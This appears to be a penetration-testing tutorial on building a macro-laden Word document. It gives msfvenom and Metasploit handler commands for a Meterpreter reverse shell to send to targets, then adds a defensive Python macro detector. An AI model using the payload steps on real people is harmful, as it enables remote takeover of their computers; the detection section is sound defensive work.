In this post, hackingloops brings you a penetration testing tutorial that uses malicious Word macros for social engineering attacks.
Our aim in this tutorial is to build a malicious Word (.doc) file. The document will carry a macro, a malicious Visual Basic script, that hands us a Meterpreter session when it runs.
This is best suited to penetration testing scenarios where we need to social engineer the targets.
Using Metasploit to create Malicious Word Documents for Penetration Testing
The Metasploit framework has a couple of built-in methods for infecting Word and Excel documents with Metasploit payloads. The technique is useful for client-side attacks, and also where you have to get past filtering that blocks executables but lets documents through. First we need to create our VBScript payload.
Command: msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=<Your-IP> LPORT=4444 -e x86/shikata_ga_nai -f vba-exe
The generated script is in two parts: the first part is created as a macro, and the second part is appended to the document text itself.
Now transfer this script to a machine with Windows and Office installed. Taking Office 2007 as the reference, here is a quick guide on how to paste the macro:
View Macros -> name the macro and select “create”.
This opens the Visual Basic editor. Copy and paste the macro code here, then save the macro.
Paste the remainder of the script into the document text.
Now set up a Metasploit listener.
Command: msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set LHOST <Your-IP>
set LPORT 4444
Send the document to the target and, once the macro runs, you get a Meterpreter session on your attacker box. This method is best suited to penetration testing scenarios where the attacker needs to bypass filters that do not allow .exe files through.
#Disclaimer: This tutorial is only for educational purposes for penetration testing.
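The filter bypass above only works as long as the filtering in front of the target treats a macro-enabled document as harmless. As an added example that is not part of the original post, the following Python script performs the content-based check a mail gateway or document filter would need: it opens an OOXML Word container (.docm/.docx, which is a ZIP archive), reports whether it declares a macro-enabled content type, whether it carries a word/vbaProject.bin part, and which auto-run and process-launch identifiers appear in that stream. The sample documents it scans are constructed in memory, and their VBA part is plain text standing in for a real compressed project; the function names, the indicator list and the blocking policy are this example's own choices, not anything from Metasploit or Microsoft.

```python
import io
import re
import zipfile

# Part name an OOXML Word document uses for its embedded VBA project.
VBA_PART = "word/vbaProject.bin"
# Main-part content types: macro-enabled (.docm) versus plain (.docx).
MACRO_MAIN_TYPE = b"application/vnd.ms-word.document.macroEnabled.main+xml"
PLAIN_MAIN_TYPE = b"application/vnd.openxmlformats-officedocument.wordprocessingml.document.main+xml"
# Auto-run entry points plus the calls a macro needs to locate, write and
# launch a dropped executable. Matched case-insensitively against the raw
# vbaProject.bin: identifiers usually survive MS-OVBA compression as literal
# runs, but reliable source recovery needs a real parser such as olevba.
INDICATORS = [b"Auto_Open", b"AutoOpen", b"Document_Open",
              b"Shell", b"CreateObject", b"Environ"]


def inspect_word_document(data: bytes) -> dict:
    """Triage an in-memory OOXML Word document without ever opening it in Office."""
    verdict = {"is_ooxml": False, "macro_content_type": False,
               "has_vba_project": False, "indicators": []}
    stream = io.BytesIO(data)
    if not zipfile.is_zipfile(stream):
        return verdict  # legacy .doc (OLE compound file) or not a document at all
    verdict["is_ooxml"] = True
    with zipfile.ZipFile(stream) as zf:
        names = set(zf.namelist())
        if "[Content_Types].xml" in names:
            verdict["macro_content_type"] = MACRO_MAIN_TYPE in zf.read("[Content_Types].xml")
        if VBA_PART in names:
            verdict["has_vba_project"] = True
            blob = zf.read(VBA_PART)
            verdict["indicators"] = [t.decode() for t in INDICATORS
                                     if re.search(re.escape(t), blob, re.IGNORECASE)]
    return verdict


def should_block(verdict: dict) -> bool:
    """Gateway policy (this example's choice): documents pass, macros do not.
    Either signal alone is enough; renaming .docm to .docx keeps vbaProject.bin."""
    return verdict["has_vba_project"] or verdict["macro_content_type"]


def build_sample(with_macro: bool) -> bytes:
    """Construct a minimal OOXML container for testing (not a real document;
    the VBA part is plain text standing in for a compressed project)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        main_type = MACRO_MAIN_TYPE if with_macro else PLAIN_MAIN_TYPE
        zf.writestr("[Content_Types].xml",
                    b'<Types><Override PartName="/word/document.xml" ContentType="'
                    + main_type + b'"/></Types>')
        zf.writestr("word/document.xml", b"<w:document/>")
        if with_macro:
            # Constructed marker stream: only the identifiers matter here.
            zf.writestr(VBA_PART, b'Attribute VB_Name = "Module1"\r\n'
                                  b"Sub Auto_Open()\r\n"
                                  b"  ' constructed: Shell / Environ tokens\r\n"
                                  b"End Sub\r\n")
    return buf.getvalue()


if __name__ == "__main__":
    for label, doc in (("macro", build_sample(True)), ("plain", build_sample(False))):
        v = inspect_word_document(doc)
        print(label, "block" if should_block(v) else "allow", v["indicators"])
```

Two caveats for anyone deploying a check like this: the decision must be made on content, not on the file extension, and the legacy binary .doc format the post targets is an OLE compound file rather than a ZIP, so the same test (look for a VBA storage and its auto-run procedures) needs an OLE parser such as oletools' olevba instead of the zipfile module. In the sample above the macro document is reported as blocked with indicators Auto_Open, Shell and Environ, while the plain document is allowed through.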